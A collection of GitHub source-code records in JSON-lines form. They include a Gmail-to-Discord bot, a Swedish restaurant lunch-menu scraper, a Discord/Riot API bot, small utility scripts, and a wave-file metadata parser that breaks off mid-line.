a[i][j][k]=b[i][j][k]*(a[i][j][k])\n return a\n\n\nif __name__ == '__main__':\n # When the application is in debug mode the Werkzeug development server is still used\n # and configured properly inside socketio.run(). In production mode the eventlet web server\n # is used if available, else the gevent web server is used.\n\n server = model_Server(GlobalModel_MNIST_CNN, \"192.168.1.111\", 6001)\n print(\"listening on 192.168.1.111:6001\");\n server.start()","repo_name":"894346698/Federated-Learning-Framework","sub_path":"model_server.py","file_name":"model_server.py","file_ext":"py","file_size_in_byte":8707,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"81"} +{"seq_id":"9585230756","text":"import datetime\ndef judgeDate(inputDate):\n if inputDate=='':\n return False\n today=datetime.datetime.today()\n date=inputDate.split('-')\n if not (len(date)==3):\n return False\n [year,month,day]=date\n if year=='' or month=='' or day=='':\n return False\n monthDate=[0,31,28,31,30,31,30,31,31,30,31,30,31]\n if int(year)<0:\n return False\n if int(month)>12 or int(month)<=0:\n return False\n if int(day)<=0 or int(day)>monthDate[int(month)]:\n return False\n stdDate = datetime.datetime.strptime(inputDate, \"%Y-%m-%d\")\n if stdDate<=today:\n return False #必须大于今天的日期\n return True\n\nif __name__==\"__main__\":\n date=input()\n print(judgeDate(date))","repo_name":"Blank-z0/VaccineProject","sub_path":"PublicFunctions/DateJudgement.py","file_name":"DateJudgement.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"35844782109","text":"field_match = {'AGENT_NAME': {\"'aakash'\", \"'rahul kumar'\"}, 'Employee_Name': {\"'rahul'\", \"'rahul kumar'\", \"'aakash'\"}, 'Branch_Category': {\"'a'\"}}\n\n\ndef get_dups(field_match):\n dup_field = {}\n for field, values in field_match.items():\n values = list(values)\n for value in values:\n count = 0\n match = value\n values_matched = []\n for match_field, match_values in field_match.items():\n match_values = list(match_values)\n if value in match_values and field != match_field:\n values_matched.append(match_field)\n values_matched.append(field)\n count += 1\n if count >0:\n dup_field[match.strip(\"'\")] = list(set(values_matched))\n return dup_field\nprint (get_dups(field_match))\n","repo_name":"mishrap9/SQL-Query","sub_path":"get_dup.py","file_name":"get_dup.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20317451127","text":"import base64\nimport email\nimport pickle\nfrom datetime import timedelta\nfrom os import getenv\nfrom typing import Dict, List, Tuple\n\nimport googleapiclient.discovery\nimport requests\nfrom dotenv import load_dotenv\nfrom structlog import get_logger\nfrom timeloop import Timeloop\n\nload_dotenv()\nwebhook = getenv('DISCORD_WEBHOOK')\ntl = Timeloop()\nlog = get_logger()\n\n\ndef get_new_pytricks(service: googleapiclient.discovery.Resource) -> List[Dict]:\n results = service.users().messages().list(userId='me', labelIds=['INBOX', 'UNREAD'],\n q='from:info@realpython.com subject:[🐍pytricks]').execute()\n messages = results.get('messages', [])\n return [service.users().messages().get(userId='me', id=msg['id'], format='raw').execute() for msg in messages]\n\n\ndef extract_message_content(mime_msg: email.message.Message) -> str:\n for part in mime_msg.get_payload():\n if part.get_content_maintype() == 'text':\n return part.get_payload(decode=True).decode()\n return ''\n\n\ndef get_content(message: Dict) -> Tuple[str, str]:\n msg = base64.urlsafe_b64decode(message['raw'].encode('ASCII'))\n mime_msg = email.message_from_bytes(msg)\n messageMainType = mime_msg.get_content_maintype()\n messageSubject = email.header.decode_header(mime_msg['subject'])[0][0].decode()\n\n if messageMainType == 'multipart':\n messageContent = extract_message_content(mime_msg)\n elif messageMainType == 'text':\n messageContent = mime_msg.get_payload(decode=True).decode()\n return messageSubject, messageContent\n\n\ndef mark_as_read(service: googleapiclient.discovery.Resource, message: Dict) -> None:\n msgId = message['id']\n body = {\"removeLabelIds\": [\"UNREAD\"]}\n response = service.users().messages().modify(userId='me', id=msgId, body=body).execute()\n log.info('Marked as read', response=response)\n\n\ndef send_to_webhook(subject: str, content: str) -> requests.models.Response:\n subject = subject.replace('_', '\\_').replace('*', '\\*')\n data = {'content': f'**{subject}**\\n```python\\n{content.split(\"------\")[0]}```\\n'}\n if len(data) < 2000:\n response = requests.post(webhook, json=data)\n else:\n parts = split_message(data)\n response = requests.post(webhook, json=parts[0])\n for part in parts[1:]:\n requests.post(webhook, json=part)\n return response\n\n\ndef split_message(message: str) -> List[str]:\n parts = []\n lines = message.split('\\n')\n part = ''\n for line in lines:\n if len(part + line) < 2000:\n part += line\n else:\n parts.append(part)\n part = line\n parts.append(part)\n return parts\n\n\n@tl.job(interval=timedelta(seconds=1800))\ndef main() -> None:\n with open('token.pickle', 'rb') as token:\n credentials = pickle.load(token)\n\n service = googleapiclient.discovery.build('gmail', 'v1', credentials=credentials)\n messages = get_new_pytricks(service)\n\n for message in messages:\n subject, content = get_content(message)\n log.info('Found new message', subject=subject)\n response = send_to_webhook(subject, content)\n\n if response.status_code == 204:\n log.info('Sent to discord', subject=subject)\n mark_as_read(service, message)\n else:\n log.error(f'Error while sending to Discord: {response.status_code} {response.content}')\n\n\nif __name__ == '__main__':\n tl.start(block=True)\n","repo_name":"meroupatate/pytricks-discord-bot","sub_path":"get_tricks.py","file_name":"get_tricks.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"10058154282","text":"with open(\"day03/inputs/input-part1.in\") as input_file:\n puzzle_input = input_file.read()\n\n\ndef format_binary_number(binary_number):\n return list(map(int, list(binary_number)))\n\n\nbinary_numbers = list(\n map(format_binary_number, puzzle_input.strip().split(\"\\n\")))\n\ndigit_frequencies = list(map(sum, zip(*binary_numbers)))\n\ngamma_rate = 0\nepsilon_rate = 0\n\nfor digit_frequency in digit_frequencies:\n most_common_digit = digit_frequency > len(binary_numbers) // 2\n\n gamma_rate *= 2\n epsilon_rate *= 2\n\n gamma_rate += most_common_digit\n epsilon_rate += not most_common_digit\n\nprint(gamma_rate * epsilon_rate)\n","repo_name":"TheNemPlayer/advent-of-code-2021","sub_path":"day03/solutions/solution-part1.py","file_name":"solution-part1.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23353425480","text":"import requests\nimport config\nimport discord\nimport json\nfrom discord import app_commands\n\nintents = discord.Intents.all()\n\nclient = discord.Client(intents=intents)\n\ntree = app_commands.CommandTree(client)\n\n@client.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(client))\n\n@client.event\nasync def on_ready():\n await tree.sync(guild=discord.Object(id=719741641463824425))\n # print \"ready\" in the console when the bot is ready to work\n print(\"ready\")\n\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n \n msg = message.content\n\n if msg.startswith('$status'):\n response = requests.get(\"https://na1.api.riotgames.com/lol/status/v4/platform-data?api_key={}\".format(config.API_KEY))\n await message.channel.send(response)\n dict = response.json()\n \n # print(dict)\n\n# response = requests.get(\"https://na1.api.riotgames.com/lol/summoner/v4/summoners/by-name/sFzzz?api_key={}\".format(config.API_KEY))\n\n@tree.command(name = \"berate\", description = \"My first application Command\", guild=discord.Object(id=719741641463824425)) \nasync def first_command(interaction):\n await interaction.response.send_message(\"You're dogshit!\")\n\n@tree.command(name=\"name\", description=\"description\",guild=discord.Object(id=719741641463824425))\nasync def slash_command(interaction: discord.Interaction): \n \n await interaction.response.send_message(\"command\")\n\nclient.run(config.LPBOT_KEY)","repo_name":"bluo47/riotapi","sub_path":"lolapi.py","file_name":"lolapi.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"43165722017","text":"from datetime import date\nimport sys\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef fix_for_html(text):\n '''\n HTML formatting of characters\n '''\n text = text.replace('ö', 'ö')\n text = text.replace('Ö', 'Ö')\n text = text.replace('å', 'å')\n text = text.replace('Å', 'Å')\n text = text.replace('ä', 'ä')\n text = text.replace('Ä', 'Ä')\n text = text.replace('é', 'é')\n text = text.replace('è', 'è')\n text = text.replace('í', 'í')\n text = text.replace('ì', 'ì')\n text = text.replace('à', 'à')\n text = text.replace('á', 'á')\n text = text.replace('ô', 'ô')\n text = text.replace('ü', 'ü')\n text = text.replace('Ä', 'Ä')\n text = text.replace('´', ''')\n text = text.replace('`', ''')\n text = text.replace('ç', 'ç')\n text = text.replace('”', '"')\n text = text.replace('è', 'è')\n text = text.replace('ä', 'ä')\n text = text.replace('Ö', 'Ä')\n text = text.replace('Ä', 'Ä')\n text = text.replace('ö', 'ö')\n text = text.replace('é', 'é')\n text = text.replace('Ã¥', 'å')\n text = text.replace('Å', 'Å')\n text = text.replace('â', '—')\n # Karolina\n text = text.replace('å', 'å')\n text = text.replace('ä', 'ä')\n text = text.replace('ö', 'ö')\n text = text.replace('Ä', 'Ä')\n\n text = text.strip()\n\n return text\n\n\n### date management start ###\ndef get_day():\n '''\n Today as digit\n '''\n return date.today().day\n\n\ndef get_monthdigit():\n '''\n Month as digit\n '''\n return date.today().month\n\n\ndef get_month():\n '''\n Month name\n '''\n months = {1: 'januari', 2: 'februari', 3: 'mars', 4: 'april',\n 5: 'maj', 6: 'juni', 7: 'juli', 8: 'augusti',\n 9: 'september', 10: 'oktober', 11: 'november', 12: 'december'}\n\n return months[get_monthdigit()]\n\n\ndef get_week():\n '''\n Week number\n '''\n return date.today().isocalendar()[1]\n\n\ndef get_weekday(lang='sv', tomorrow=False):\n '''\n Day name in swedish(sv) or english (en)\n '''\n wdigit = get_weekdigit()\n if tomorrow:\n wdigit += 1\n if lang == 'sv':\n weekdays = {0: 'måndag', 1: 'tisdag', 2: 'onsdag', 3: 'torsdag',\n 4: 'fredag', 5: 'lördag', 6: 'söndag', 7: 'måndag'}\n if lang == 'en':\n weekdays = {0: 'monday', 1: 'tuesday', 2: 'wednesday', 3: 'thursday',\n 4: 'friday', 5: 'saturday', 6: 'sunday', 7: 'monday'}\n return weekdays[wdigit]\n\n\ndef get_weekdigit():\n '''\n Get digit for week (monday = 0)\n '''\n return date.today().weekday()\n\n\ndef get_year():\n '''\n Year as number\n '''\n return date.today().year\n### date management end ###\n\n### parsers start ###\ndef parse_bikupan(resdata):\n '''\n Parse the menu of Restaurang Bikupan\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Uppsala',\n resdata[2], resdata[4])\n\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n relevant = soup.find(\"div\", {\"class\": \"col-md-3 hors-menu text-center\"})\n dishes = relevant.find_all(\"div\", {\"class\": \"col-xs-10 text-left\"})\n for dish in dishes:\n lines.append(dish.get_text().strip().replace('\\n', ' ') + '<br/>')\n lines += restaurant_end()\n return lines\n\n\ndef parse_dufva(resdata):\n '''\n Parse the menu of Sven Dufva\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Uppsala',\n resdata[2], resdata[4])\n\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n relevant = soup.find(\"div\", {\"id\": \"post\"})\n menu_lines = relevant.get_text().split('\\n')\n dag = get_weekday()\n started = False\n for line in menu_lines:\n if not line:\n continue\n if line.lower() == dag:\n started = True\n continue\n if started:\n if line[0] != '-':\n lines.append(line.strip() + '<br/>')\n else:\n break\n lines += restaurant_end()\n return lines\n\n\ndef parse_glada(resdata):\n '''\n Parse the menu of Glada restaurangen\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n # No way I'll parse this one. If anyone actually wants to, I'd be happy to accept a patch.\n\n lines += restaurant_end()\n return lines\n\n\ndef parse_haga(resdata):\n '''\n Print a link to the menu of Haga gatukök\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n lines += restaurant_end()\n return lines\n\n\ndef parse_hjulet(resdata):\n '''\n Parse the menu of Restaurang Hjulet\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n try:\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n days = soup.find('table', {'class':'table lunch_menu animation'})\n dishes = days.find('td', {'class':'td_title'})\n lines.append(dishes.get_text().strip().replace('\\n', '<br/>'))\n except Exception as err:\n sys.stderr.write(err)\n lines += restaurant_end()\n\n return lines\n\n\ndef parse_hubben(resdata):\n '''\n Parse the menu of Restaurang Hubben\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Uppsala',\n resdata[2], resdata[4])\n\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n days = soup.find_all(\"div\", {\"class\": \"day\"})\n current = days[get_weekdigit()]\n dishes = current.find_all('div', {'class': 'element description col-md-4 col-print-5'})\n for dish in dishes:\n lines.append(dish.get_text().strip().replace('\\n', ' ') + '<br/>')\n lines += restaurant_end()\n return lines\n\n\ndef parse_jons(resdata):\n '''\n Parse the menu of Jöns Jacob\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n days = soup.find('table', {'class':'table lunch_menu animation'})\n day = days.find('tbody', {'class':'lunch-day-content'})\n dishes = day.find_all('td', {'class':'td_title'})\n for dish in dishes:\n lines.append(dish.get_text().strip().split('\\n')[1] + '<br/>')\n\n lines += restaurant_end()\n return lines\n\n\ndef parse_jorpes(resdata):\n '''\n Parse the menu of Resturang Jorpes\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n lines += restaurant_end()\n return lines\n\n\ndef parse_karolina(resdata):\n '''\n Parse the menu of Restaurang Karolina\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n try:\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n days = soup.find('table', {'class':'table lunch_menu animation'})\n day = days.find('tbody', {'class':'lunch-day-content'})\n dishes = day.find_all('td', {'class':'td_title'})\n for dish in dishes:\n lines.append(dish.get_text().strip().split(':')[1] + '<br/>')\n\n except Exception as err:\n sys.stderr.write(err)\n\n lines += restaurant_end()\n return lines\n\n\ndef parse_livet(resdata):\n '''\n Parse the menu of Livet [restaurant]\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n try:\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n days = soup.find('div', {'class':'property--xhtml-string'})\n started = False\n for row in days.find_all('p'):\n if get_weekday() in row.get_text().lower():\n started = True\n continue\n if get_weekday(tomorrow=True) in row.get_text().lower():\n break\n if started:\n dish = row.find('b')\n dish_text = dish.get_text().replace('\\xa0', '')\n if dish_text:\n lines.append(dish_text + '<br/>')\n\n\n except Exception as err:\n sys.stderr.write('E: Livet: {}'.format(err))\n\n lines += restaurant_end()\n return lines\n\n\ndef parse_mollan(resdata):\n '''\n Parse the menu of Mollan\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n # To be fixed some day. Not fun.\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n soup = BeautifulSoup(page_req.text, 'html.parser')\n relevant = soup.find_all('span', {'class': 'mobile-undersized-upper'})\n wday = fix_for_html(get_weekday())\n started = False\n for tag in relevant:\n if 'bold' in tag['style']:\n if wday in tag.get_text().lower():\n started = True\n continue\n if started:\n break\n if started:\n lines.append(fix_for_html(tag.get_text()) + '<br/>')\n\n lines += restaurant_end()\n\n return lines\n\n\ndef parse_nanna(resdata):\n '''\n Parse the menu of Nanna Svartz\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n # will fix some day. Not fun.\n #page_req = requests.get(resdata[3])\n #if page_req.status_code != 200:\n # raise IOError('Bad HTTP responce code')\n\n lines += restaurant_end()\n return lines\n\n\ndef parse_rudbeck(resdata):\n '''\n Parse the menu of Bistro Rudbeck\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n days = soup.find_all('div', {'class':'container-fluid no-print'})\n day = days[get_weekdigit()]\n dishes = day.find_all('span')[3:]\n for dish in dishes:\n lines.append(dish.get_text().strip() + '<br/>')\n\n lines += restaurant_end()\n return lines\n\n\ndef parse_subway(resdata):\n '''\n Print info about Subway\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n lines += restaurant_end()\n return lines\n\n\ndef parse_svarta(resdata):\n '''\n Parse the menu of Svarta Räfven\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n # page_req = requests.get(resdata[3])\n # soup = BeautifulSoup(page_req.text, 'html.parser')\n\n lines += restaurant_end()\n return lines\n\n### parsers end ###\n\ndef restaurant_end():\n '''\n Finish the tags after the listing of the menu of a restaurant\n '''\n lines = list()\n lines.append('</p>')\n lines.append('</div>')\n return lines\n\n\ndef restaurant_start(restaurant, location, home_url, mapurl):\n ''''\n Start the listing of the menu of a restaurant\n '''\n lines = list()\n lines.append('<!--{}-->'.format(restaurant))\n lines.append('<div class=\"title\"><a href=\"{url}\"> {rest}</a>'.format(rest=restaurant,\n url=home_url) +\n ' (<a href=\"{murl}\">{loc}</a>)</div>'.format(loc=location,\n murl=mapurl))\n lines.append('<div class=\"menu\">')\n lines.append('<p>')\n return lines\n","repo_name":"viklund/lunch-menu","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":12980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"37806717388","text":"import array as arr\n\nx = arr.array('i', [1,2,3,4,5,6])\n\n\"\"\"\nTypes for an array is derived from C language\n\ni -> integer -> 2 byte\nf -> float -> decimal -> 4 byte\nd -> double -> decimal -> 8 byte\n\"\"\"\n\nfor i in range(0, len(x)):\n\tprint(x[i])\n\nprint(x, type(x), len(x))\n\nx[0] = 0 # update an element\n\nx.append(-3)\nx.insert(1, 99)\nfor i in range(0, len(x)):\n\tprint(x[i])\n\n# slicing\n\ny = x[1:5]\nfor i in range(0, len(y)):\n\tprint(y[i])\n","repo_name":"singhsanket143/Unacademy_Pec_Python","sub_path":"arraysinpython.py","file_name":"arraysinpython.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"81"} +{"seq_id":"19365904071","text":"\"\"\"\nRead meta data and cue lists from wave files.\n\n- `metadata_wave()`: read metadata of a wave file.\n\n\n## Documentation of wave file format\n\nFor wave chunks see:\n\n- https://sites.google.com/site/musicgapi/technical-documents/wav-file-format#cue\n- http://fhein.users.ak.tu-berlin.de/Alias/Studio/ProTools/audio-formate/wav/overview.html\n- http://www.gallery.co.uk/ixml/\n\nFor tag names see:\n\n- see https://exiftool.org/TagNames/RIFF.html#Info%20for%20valid%20info%20tags\n\"\"\"\n\nimport struct\nimport xml.etree.ElementTree as ET\n\n\n# see https://exiftool.org/TagNames/RIFF.html#Info%20for%20valid%20info%20tags\ninfo_tags = dict(AGES='Rated',\n CMNT='Comment',\n CODE='EncodedBy',\n DTIM='DateTimeOriginal',\n GENR='Genre',\n IART='Artist',\n ICMT='Comment',\n ICNT='Country',\n ICOP='Copyright',\n ICRD='DateCreated',\n IDIT='DateTimeOriginal',\n IENC='EncodedBy',\n IENG='Engineer',\n IGNR='Genre',\n IKEY='Keywords',\n ILNG='Language',\n IMIT='MoreInfoText',\n IMIU='MoreInfoURL',\n IMUS='MusicBy',\n INAM='Title',\n IPRD='Product',\n IRTD='Rating',\n ISBJ='Subject',\n ISFT='Software',\n ISRC='Source',\n ITCH='Technician',\n ITRK='TrackNumber',\n IWRI='WrittenBy',\n LANG='Language',\n LOCA='Location',\n TAPE='TapeName',\n TITL='Title',\n TLEN='Length',\n TRCK='TrackNumber',\n TVER='Version',\n YEAR='Year',\n IBRD='uCBoard',\n IMAC='MACAdress')\n\n\ndef metadata_wave(file, store_empty=False, verbose=0):\n \"\"\" Read metadata of a wave file.\n\n Parameters\n ----------\n file: string or file handle\n The wave file.\n store_empty: bool\n If `False` do not add meta data with empty values.\n verbose: int\n Verbosity level.\n\n Returns\n -------\n meta_data: nested dict\n Meta data contained in the wave file. Keys of the nested\n dictionaries are always strings. If the corresponding\n values are dictionaries, then the key is the section name\n of the metadata contained in the dictionary. All other\n types of values are values for the respective key. In\n particular they are strings, or list of strings. But other\n simple types like ints or floats are also allowed.\n First level contains sections of meta data\n (keys 'INFO' or 'BEXT', values are dictionaries).\n cues: list of dict\n Cues contained in the wave file. Each item in the list provides\n - 'id': Id of the cue.\n - 'pos': Position of the cue in samples.\n - 'length': Number of samples the cue covers (optional, from PLST or LTXT chunk).\n - 'repeats': How often the cue segment should be repeated (optional, from PLST chunk).\n - 'label': Label of the cue (optional, from LABL chunk).\n - 'note': Note on the cue (optional, from NOTE chunk).\n - 'text': Description of cue segment (optional, from LTXT chunk).\n\n Raises\n ------\n ValueError\n Not a wave file.\n \"\"\"\n\n def riff_chunk(sf):\n \"\"\" Read and check the RIFF file header. \"\"\"\n str1 = sf.read(4).decode('latin-1')\n if str1 != 'RIFF':\n raise ValueError(\"Not a wave file.\")\n fsize = struct.unpack('<I', sf.read(4))[0] + 8\n str2 = sf.read(4).decode('latin-1')\n if str2 != 'WAVE':\n raise ValueError(\"Not a wave file.\")\n return fsize\n\n def skip_chunk(sf):\n \"\"\" Skip over unknown chunk. \"\"\"\n data = sf.read(4)\n size = struct.unpack('<I', data)[0]\n size += size % 2 \n sf.seek(size, 1)\n\n def cue_chunk(sf, cues):\n \"\"\" Read in cue ids and positions from cue chunk. \"\"\"\n size, n = struct.unpack('<II', sf.read(8))\n for c in range(n):\n id, pos = struct.unpack('<II', sf.read(8))\n datachunkid = sf.read(4).decode('latin-1').rstrip(' \\x00').upper()\n chunkstart, blockstart, offset = struct.unpack('<III', sf.read(12))\n c = dict(id=id, pos=pos)\n cues.append(c)\n\n def playlist_chunk(sf, cues):\n \"\"\" Read in cue length and repeats from playlist chunk. \"\"\"\n size, n = struct.unpack('<II', sf.read(8))\n for p in range(n):\n id, length, repeats = struct.unpack('<III', sf.read(12))\n for c in cues:\n if c['id'] == id:\n c['length'] = length\n c['repeats'] = repeats\n break\n\n def info_chunks(sf, list_size, store_empty):\n \"\"\" Read in meta data from info list chunk. \"\"\"\n md = {}\n while list_size >= 8:\n key = sf.read(4).decode('latin-1').rstrip(' \\x00')\n size = struct.unpack('<I', sf.read(4))[0]\n size += size % 2\n value = sf.read(size).decode('latin-1').rstrip(' \\x00')\n list_size -= 8 + size\n if key in info_tags:\n key = info_tags[key]\n if value or store_empty:\n md[key] = value\n if list_size > 0:\n sf.seek(list_size, 1)\n return md\n\n def list_chunk(sf, cues, verbose=0):\n \"\"\" Read in list chunk. \"\"\"\n md = {}\n list_size = struct.unpack('<I', sf.read(4))[0]\n list_type = sf.read(4).decode('latin-1').upper()\n list_size -= 4\n if list_type == 'INFO':\n md = info_chunks(sf, list_size, store_empty)\n elif list_type == 'ADTL':\n while list_size >= 8:\n key = sf.read(4).decode('latin-1').rstrip(' \\x00').upper()\n size, id = struct.unpack('<II', sf.read(8))\n size += size % 2 - 4\n if key == 'LABL':\n label = sf.read(size).decode('latin-1').rstrip(' \\x00')\n for c in cues:\n if c['id'] == id:\n c['label'] = label\n break\n elif key == 'NOTE':\n note = sf.read(size).decode('latin-1').rstrip(' \\x00')\n for c in cues:\n if c['id'] == id:\n c['note'] = note\n break\n elif key == 'LTXT':\n length = struct.unpack('<I', sf.read(4))[0]\n sf.read(12)\n text = sf.read(size - 4 - 12).decode('latin-1').rstrip(' \\x00')\n for c in cues:\n if c['id'] == id:\n c['length'] = length\n c['text'] = text\n break\n else:\n if verbose > 0:\n print(' skip', key, size, list_size)\n sf.read(size)\n list_size -= 12 + size\n if list_size > 0:\n sf.seek(list_size, 1)\n else:\n print('ERROR: unknown list type', list_type)\n return md\n\n def bext_chunk(sf, store_empty=True):\n \"\"\" Read in meta-data from the broadcast-audio extension chunk.\n\n See https://tech.ebu.ch/docs/tech/tech3285.pdf for specifications.\n\n Returns\n -------\n meta_data: dict\n - 'Description': a free description of the sequence.\n - 'Originator': name of the originator/ producer of the audio file.\n - 'OriginatorReference': unambiguous reference allocated by the originating organisation.\n - 'OriginationDate': date of creation of audio sequence in yyyy:mm:dd.\n - 'OriginationTime': time of creation of audio sequence in hh:mm:ss.\n - 'TimeReference': first sample since midnight.\n - 'Version': version of the BWF.\n - 'UMID': unique material identifier.\n - 'LoudnessValue': integrated loudness value.\n - 'LoudnessRange': loudness range.\n - 'MaxTruePeakLevel': maximum true peak value in dBTP.\n - 'MaxMomentaryLoudness': highest value of the momentary loudness level.\n - 'MaxShortTermLoudness': highest value of the short-term loudness level.\n - 'Reserved': 180 bytes reserved for extension.\n - 'CodingHistory': description of coding processed applied to the audio data.\n \"\"\"\n md = {}\n size = struct.unpack('<I', sf.read(4))[0]\n size += size % 2\n s = sf.read(256).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['Description'] = s\n s = sf.read(32).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['Originator'] = s\n s = sf.read(32).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['OriginatorReference'] = s\n s = sf.read(10).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['OriginationDate'] = s\n s = sf.read(8).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['OriginationTime'] = s\n reference, version = struct.unpack('<QH', sf.read(10))\n if reference > 0 or store_empty:\n md['TimeReference'] = reference\n if version > 0 or store_empty:\n md['Version'] = version\n s = sf.read(64).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['UMID'] = s\n lvalue, lrange, peak, momentary, shortterm = struct.unpack('<hhhhh', sf.read(10))\n if lvalue > 0 or store_empty:\n md['LoudnessValue'] = lvalue\n if lrange > 0 or store_empty:\n md['LoudnessRange'] = lrange\n if peak > 0 or store_empty:\n md['MaxTruePeakLevel'] = peak\n if momentary > 0 or store_empty:\n md['MaxMomentaryLoudness'] = momentary\n if shortterm > 0 or store_empty:\n md['MaxShortTermLoudness'] = shortterm\n s = sf.read(180).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['Reserved'] = s\n size -= 256 + 32 + 32 + 10 + 8 + 8 + 2 + 64 + 10 + 180\n s = sf.read(size).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['CodingHistory'] = s\n return md\n\n def parse_xml(element):\n md = {}\n for e in element:\n if not e.text is None:\n md[e.tag] = e.text\n elif len(e.getchildren()) > 0:\n md[e.tag] = parse_xml(e)\n elif store_empty:\n md[e.tag] = ''\n return md\n\n def ixml_chunk(sf):\n size = struct.unpack('<I', sf.read(4))[0]\n size += size % 2\n xmls = sf.read(size).decode('latin-1').rstrip(' \\x00')\n root = ET.fromstring(xmls)\n md = {root.tag: parse_xml(root)}\n return md\n \n meta_data = {}\n cues = []\n sf = file\n file_pos = None\n if hasattr(file, 'read'):\n file_pos = sf.tell()\n sf.seek(0, 0)\n else:\n sf = open(file, 'rb')\n fsize = riff_chunk(sf)\n while (sf.tell() < fsize - 8):\n chunk = sf.read(4).decode('latin-1').upper()\n if chunk == 'LIST':\n md = list_chunk(sf, cues, verbose)\n if len(md) > 0:\n meta_data['INFO'] = md\n elif chunk == 'CUE ':\n cue_chunk(sf, cues)\n elif chunk == 'PLST':\n playlist_chunk(sf, cues)\n elif chunk == 'BEXT':\n md = bext_chunk(sf, store_empty)\n meta_data['BEXT'] = md\n elif chunk == 'IXML':\n md = ixml_chunk(sf)\n meta_data['IXML'] = md\n else:\n if verbose > 0:\n print('skip', chunk)\n skip_chunk(sf)\n if verbose > 1:\n print(f' file size={fsize}, file position={sf.tell()}')\n if file_pos is None:\n sf.close()\n else:\n sf.seek(file_pos, 0)\n return meta_data, cues\n\n\n\ndef main(args):\n \"\"\"Call demo with command line arguments.\n\n Parameters\n ----------\n args: list of strings\n Command line arguments as provided by sys.argv\n \"\"\"\n if len(args) <= 1 or args[1] == '-h' or args[1] == '--help':\n print('')\n print('Usage:')\n print(' python -m audioio.wavemetadata [--help] <audio/file.wav>')\n return\n\n # read meta data:\n meta_data, cues = metadata_wave(args[1], store_empty=False, verbose=1)\n \n # print meta data:\n print()\n print('meta data:')\n for sk in meta_data:\n md = meta_data[sk]\n if isinstance(md, dict):\n print(f'{sk}:')\n for k in md:\n print(f' {k:22}: {md[k]}')\n else:\n print(f'{sk}:\\n 